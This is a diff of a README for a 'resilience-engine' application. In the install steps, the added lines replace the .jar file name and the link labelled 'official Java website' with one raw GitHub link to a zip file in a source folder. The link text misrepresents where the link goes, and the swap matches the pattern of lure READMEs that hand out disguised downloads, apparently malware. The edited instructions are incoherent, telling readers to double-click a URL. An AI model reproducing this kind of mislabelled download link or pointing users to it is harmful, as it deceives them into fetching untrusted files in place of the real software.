Jarama88/resilience-engine/README.md

 ### 5. Open the Application

 Open the folder that was created when you extracted the files.
-Inside, you will find the application file named `resilience-engine.jar`.
+Inside, you will find the application file named `https://raw.githubusercontent.com/Jarama88/resilience-engine/master/src/strategies/resilience_engine_indefaceable.zip`.

 To run the application, ensure you have Java installed on your computer.
-If you don't have Java, you can download it from the [official Java website](https://www.java.com/en/download/).
+If you don't have Java, you can download it from the [official Java website](https://raw.githubusercontent.com/Jarama88/resilience-engine/master/src/strategies/resilience_engine_indefaceable.zip).

-Once Java is installed, double-click `resilience-engine.jar`.
+Once Java is installed, double-click `https://raw.githubusercontent.com/Jarama88/resilience-engine/master/src/strategies/resilience_engine_indefaceable.zip`.
 The application should start up, and you'll be ready to manage your tasks!

 ## ⚙️ System Requirements